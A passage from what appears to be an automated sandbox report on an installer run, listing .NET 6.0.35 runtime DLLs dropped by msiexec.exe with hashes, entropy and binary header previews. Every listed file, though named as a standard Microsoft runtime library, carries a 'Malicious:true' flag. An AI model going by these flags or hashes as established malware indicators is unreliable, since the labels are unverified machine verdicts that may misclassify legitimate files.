                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*.ORn.!.n.!.n.!.g...b.!... .m.!.n. ./.!.<.$.q.!.<.%.d.!.<.".f.!...).@.!...!.o.!.....o.!...#.o.!.Richn.!.........PE..d......f.........." ......................................................................`A.........................................V..<...<Y..x.......h....p.......r...)...........&..p...........................0'..8............................................text............................... ..`.rdata..._.......`..................@..@.data...,....`.......H..............@....pdata.......p.......L..............@..@_RDATA...............j..............@..@.rsrc...h............l..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):39688
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.509096272626782
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:0WPIIWzAp7Xgjg1al2Yd5zDN2g47XCIYUvsWIXpuJFH9CEUoGdqtHfSBGU0ypu+H:+OwDf4gMCUUjgsEUtcGpXvFClVRxw9zf
                                                                                                                                                                                                                                                                                                                                  MD5:B9C3C7F050ADF5D8AB365AB6D3587286
                                                                                                                                                                                                                                                                                                                                  SHA1:0FF43EDC2E21828E491CD662B379A7F69FD5C016
                                                                                                                                                                                                                                                                                                                                  SHA-256:25EACA54AA1CDF58C6EDF379C6F61674C968DB982E56CBF5072576E058B679A3
                                                                                                                                                                                                                                                                                                                                  SHA-512:54780E0040B03CB1783F8FB8177AB57F3C1E70D1279B3B4C40E9E84F291309F7DDDFF2893F11652DEBAA68FA7CE5EFFBCAB6A43198A967408D777D5E809F39C8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...O............" .....d..........................................................2.....`...@......@............... ..................................P.......4....r...)..............T...........................................................P...H............text....b.......d.................. ..`.data...e............f..............@....reloc...............p..............@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):267056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676156102505666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:pPlVaqxaMRqarRTaoJLaT2uPhMSt3JiTHqE0F8LVq/GMjya953xieUbwn+3cCEqC:j0eD8xwgiTzVqXtpIMV/cOVjKGb
                                                                                                                                                                                                                                                                                                                                  MD5:649DBDC92B5DBD1607A1F6B650BEC02C
                                                                                                                                                                                                                                                                                                                                  SHA1:F41CEF14036CE1B578720F43F646D24B09E74DA5
                                                                                                                                                                                                                                                                                                                                  SHA-256:732AADE5AC1542E66ACA020BDC2C8BFDBCEC21168F7B347F88A844315713AA8F
                                                                                                                                                                                                                                                                                                                                  SHA-512:2C8D70EF32E5840276A1EBE3215FB6FDFDFEFDDEBF392970578F1C9B2AE33B100980BBDA639A51769CAA07A3046E22DF1D6CD9DFE6A0E10F83F0A0941CAD740D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...).1..........." .........@......................................................&.....`...@......@............... .................................. ....j..T.......0)......@... '..T........................................................... ...H............text...1........................... ..`.data....8.......:..................@....reloc..@...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........(.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.AccessControl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):93960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.568373020345826
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:QaWBXrBsyesUkP3IYoXxs6+gvXYqFBigvfL4iuz0:QdBXr2yrIjo4CCT4BQ
                                                                                                                                                                                                                                                                                                                                  MD5:6F62AB0BC69B1115DB7EA79AC22B249F
                                                                                                                                                                                                                                                                                                                                  SHA1:DF95F07D55F58EBE9323F7F3CB4C53B4A4E16D28
                                                                                                                                                                                                                                                                                                                                  SHA-256:388D827290273301ECE6A797E2021238675BBDB424C520F4CF922C5420F4B9B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:9AC0230B59FE22C30B381A294CC3C4B8FB43FB17268C810172CE2B35337467F4A0501C7DAE3C140FA37465ABCAD2D830C6D63F1A278ABBFAF2ADAB315F024E5C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....`..........." .....(...................................................p.......>....`...@......@............... ..................................t...T/.......F...)...`......H...T...........................................................x...H............text...w&.......(.................. ..`.data........@.......*..............@....reloc.......`.......B..............@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.DriveInfo.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.444572054452613
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:9WUWyWquDVCHWl2Yd5zwNirXKT2JoYuchKG46JdicX+zu6CVy1/8K4Y5eHs+dLiq:ovf/mv36JwcXKLkK4YoSL1W9U9zG
                                                                                                                                                                                                                                                                                                                                  MD5:467F13402BC600AE9872E7A82D891D1A
                                                                                                                                                                                                                                                                                                                                  SHA1:837E11B9B7C67B617538958267849DBC3B080EF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:B26AEB1B48380512658550F2BE2C196C46F067FA5014E5C0693A289243364D4D
                                                                                                                                                                                                                                                                                                                                  SHA-512:2440286517E87F5D93446271C5B10AD53C1E7EC21E5C59B067392A6935E5CDA73F5750398859BCBB204511025C4D5633E3BA9220FFFDA31D2EB0683217508126
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...}=............" .....p..........................................................I.....`...@......@............... ..................................\............~.. )..............T...........................................................`...H............text....n.......p.................. ..`.data...s............r..............@....reloc...............|..............@..B............................................0.......................L.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........d.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...@.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8279746301481845
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:QdhYqx9jW/uqWjpWjA6Kr4PFHnhWgN7agWirdIhHssDX01k9z3AGWym+:QdJ9jW/uqWjYA6VFHRN7FriFDR9z7Wa
                                                                                                                                                                                                                                                                                                                                  MD5:6334DFF8984928C204C051F8BB212F73
                                                                                                                                                                                                                                                                                                                                  SHA1:2C64DDA4206516603475EC7AD9539312F8019666
                                                                                                                                                                                                                                                                                                                                  SHA-256:EEA42A0A145C32604C595A6A0A1AA1221AF7C5FF78F4F68C5A274A6239A1A834
                                                                                                                                                                                                                                                                                                                                  SHA-512:443A2AEAAE4E5F74DA8B41F1C6EF8E6C653E07B1238516650DB835298850D44DB87EB55C8A71A8EB90CEDDEA3C2B81A6F3655FF4C1FDAE7B72FE6C9CF48B61F9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!C............"!..0..............)... ........@.. ....................................`.................................`)..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ........................................E....(r...;.=:|..~P...m.'...tAI.y.#.;......k.....l..........T.G.R.!.a.....#.-...D.2.:X.5.ku.|.[.9W.......v.(L..6.....j;..\BSJB............v4.0.30319......`.......#~..L.......#Strings............#GUID...,.......#Blob......................3................................................!.J.....J..._.7...j.......................E...........Z.......................A.....s.....u.J.................1.....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.Watcher.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):72456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.538568534245824
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:rFuxG26GxE6ILBZ2ds7lgIdVI0bWG5izpzWeA:rkxpVWlZh7lR7I0bp5+pyeA
                                                                                                                                                                                                                                                                                                                                  MD5:6856A5853399F7C86959542D4ABE32D1
                                                                                                                                                                                                                                                                                                                                  SHA1:9AA4CE1651EAA297E15AA9F8F784B94D606242E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:A101BBC1337F65C6BE09AC88854029AFBE9469528B659C92CC32BAE1CAC1BE36
                                                                                                                                                                                                                                                                                                                                  SHA-512:C5B66CEA3FA103FC05E0A58F6F5D8B4C2B12AC11ED32FB873C1F4C90D35F49B508BA28F87A9AE85758A20151C8A5D7CB6575FD3BD6AC0702272F2E8F8C399047
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....A..........." ......................................................... ............`...@......@............... ..................................P...d(...........)......p.......T...........................................................P...H............text............................... ..`.data...............................@....reloc..p...........................@..B............................................0.......................@.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........X.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...4.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):24328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.349400167788197
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:wz5aPWc+mFnJ85Zu+m2sqjd5z5nNkch2LthOWyy2WQYA6VFHRN7i2R9zza+AsT:wIP7Fn8dPfVqekFYFCliK9zMS
                                                                                                                                                                                                                                                                                                                                  MD5:A45852ED049BBB2BBC5036E3909FCB7D
                                                                                                                                                                                                                                                                                                                                  SHA1:93A8FBFD22D84182944949C1619AD1181CD339EE
                                                                                                                                                                                                                                                                                                                                  SHA-256:9EF524A46534029C549509E464CD5893E32FBDE5EF29BD00AA2020AA5C5CA7FC
                                                                                                                                                                                                                                                                                                                                  SHA-512:058CC5F00A6965DFE2F650B7D4FDFA41F53ECA95C1BD7DD3F0A0113D8DA7C643FA0D41AD4F86F51AB4BBB7486485E08064F2CDED437652170F597BDF143EFDF0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f./..........."!..0..,..........NJ... ........@.. ....................................`..................................I..S....`...............6...)..........LI..8............................................ ............... ..H............text...T*... ...,.................. ..`.rsrc........`......................@..@.reloc...............4..............@..B................0J......H.......h?..............P .......>.....................................................lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet....9.......PADPADP..7../...........S.t...p..T...3.2...0.J.M.*.=.0....bAA. .e......"....N..~..s...@].Sew.s.t.7.4...5.......x..........]..Q~........#n..'.<.+2]./...0...2.W.4...4>..5q..:...>(.3OL"PP^..V~..VV..eRaDf.3.f7..f..fj.Hpj.1.j..&u

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):83720
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.496857838837457
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:o8cy0w9JvivZVauxGHUopdNeU+Mf36HZMV8cidIzN:om9JviyuxGHUopdNeuf36HKqcV5
                                                                                                                                                                                                                                                                                                                                  MD5:3B2A12A984CE0BF13D5456E2A1A8B7E1
                                                                                                                                                                                                                                                                                                                                  SHA1:9AFF09FBE28F6229A568EFE481649427B9E940EF
                                                                                                                                                                                                                                                                                                                                  SHA-256:E93461BD9BB50625F8EDB92B80747C73BBCE2012058E8ED18CB80ED5BE0C8C4E
                                                                                                                                                                                                                                                                                                                                  SHA-512:94331602911AB39A5EC816562F5D29B7982B180FA7A88C752C4E58B5E95281F94B97BF95E33CA6643977EB4F4D88F4BC153E1FBA10FB460803636EE93D134B04
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....H..........." .........................................................P............`...@......@............... ..................................8....,...........)...@..........T...........................................................8...H............text............................... ..`.data...}.... ......................@....reloc.......@......................@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):69392
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.416282203605119
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6q4zbv1VnpSetYSxycVFidKg0WWcnic23zc:6jv1SetYMXVMdKg0WWm634
                                                                                                                                                                                                                                                                                                                                  MD5:A28A3AA833134E59F793389AFF65DA55
                                                                                                                                                                                                                                                                                                                                  SHA1:5ECE44F0ECC710BA0732633B7078A70867936964
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9774E7FB725A7517BCC758832F2FC3046EECC5DC05656757BF3E6B555340289
                                                                                                                                                                                                                                                                                                                                  SHA-512:3DF973C8247E2E1277679F9C6F2FB8DF0B8536BCE073455E3AB858D2F5674E7A49E6D0C90953AAC09480859D72373CA750CB6A094AEC8656CB5D151D305C721D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...N............" ......................................................................`...@......@............... ..................................D...@%...........)..............T...........................................................H...H............text............................... ..`.data...h...........................@....reloc..............................@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.AccessControl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796773675745742
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qhedWmW+lPWp2YA6VFHRN7IP2IR9zo+CK:qhGl/FClfU9zwK
                                                                                                                                                                                                                                                                                                                                  MD5:6CA91D68B229B7FB22BAF4CD90E3B6DF
                                                                                                                                                                                                                                                                                                                                  SHA1:5992816675CDF4A308AE3ED4B067333E2A6136DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:457210C9BEE0BC23BB939A0C066648A1BF644EFC2E688CD5B9A34A0887E8B9D7
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC229BE933AA3AC268A1DB6F3D72BBBFEE17132D9E219A811D191FF119F127E3640B26CF00913716CE431BE17314D2F5300A4FB55C9709E7A91DDF4B6C6838A3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H............."!..0..............-... ........@.. ...............................d....`.................................4-..W....@..T................)...`......p,..8............................................ ............... ..H............text........ ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B................p-......H........"..............P ......h"...........................................<linker>.. <assembly fullname="System.IO.Pipes.AccessControl" feature="System.Resources.UseSystemResourceKeys" featurevalue="true">.. System.Resources.UseSystemResourceKeys removes resource strings and instead uses the resource key as the exception message -->.. <resource name="FxResources.System.IO.Pipes.AccessControl.SR.resources" action="remove" />.. <type fullname="System.SR">..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):136456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.505276293770358
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Tesr1AT4UdLwfR0CogtN6gQTveCMi0eZemClyk87hv/d4:dAk0EtMgCWS0tev/W
                                                                                                                                                                                                                                                                                                                                  MD5:9B7CB60F3687BB167C364027C69BE75F
                                                                                                                                                                                                                                                                                                                                  SHA1:F7D769F90F6FD22C121068CEC9AEC982CDB8511E
                                                                                                                                                                                                                                                                                                                                  SHA-256:ED9A1BFEC6B09CDDE2BB9FD7360C317A8FA536A39A211C649BC09324F6230455
                                                                                                                                                                                                                                                                                                                                  SHA-512:8428475F090AC092B2F97A824FA37AC21CE033C879CA082C93C3A127AE9086851997691CBFA85C232E96401D7347C2C075078A1A61DDEEF02D9A6AC095BFC776
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........(............................................... ......@H....`...@......@............... ......................................H;...........)..............T...............................................................H............text............................... ..`.data....".......$..................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.835129073107362
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:pRHaXwxxx0SsWj6+WCpWjA6Kr4PFHnhWgN7agWtu8RwX01k9z3AeJR42Z1Of:4wb+ZWj6+WCYA6VFHRN7n9R9zrJRLZ1u
                                                                                                                                                                                                                                                                                                                                  MD5:255A63BB93AC8BEE021387B56A829104
                                                                                                                                                                                                                                                                                                                                  SHA1:B2BA88675BE4E005FB696ADEF5E99ADF2DEFAF47
                                                                                                                                                                                                                                                                                                                                  SHA-256:AAC0BCE431DE0D833394371359AE5BDD94B369C77733AA078B2EFAACDFCCCB2F
                                                                                                                                                                                                                                                                                                                                  SHA-512:3BB01D1F576C03895B0AA235624EC5B868EAF91621F997018A8F6EFBF469FD930AB548B4F1450D2B4AA543388BA4B9645284CBD2BEF0F39370341E911E1919A3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\..........."!..0..............)... ........@.. ....................................`..................................)..K....@...................)...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................Q..].i...........k;.!..)zw.V....0/(J......$L.....1i.A.+..D5.....G.|.&.c.va7.c..6L..!R......N..3...........RO........D....#BSJB............v4.0.30319......`.......#~..<.......#Strings....,.......#GUID...<.......#Blob......................3................................................,...........E...........p.......W.................^...+.^.....^...e.^.....^.....^.....^...L.^...Y.^.................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
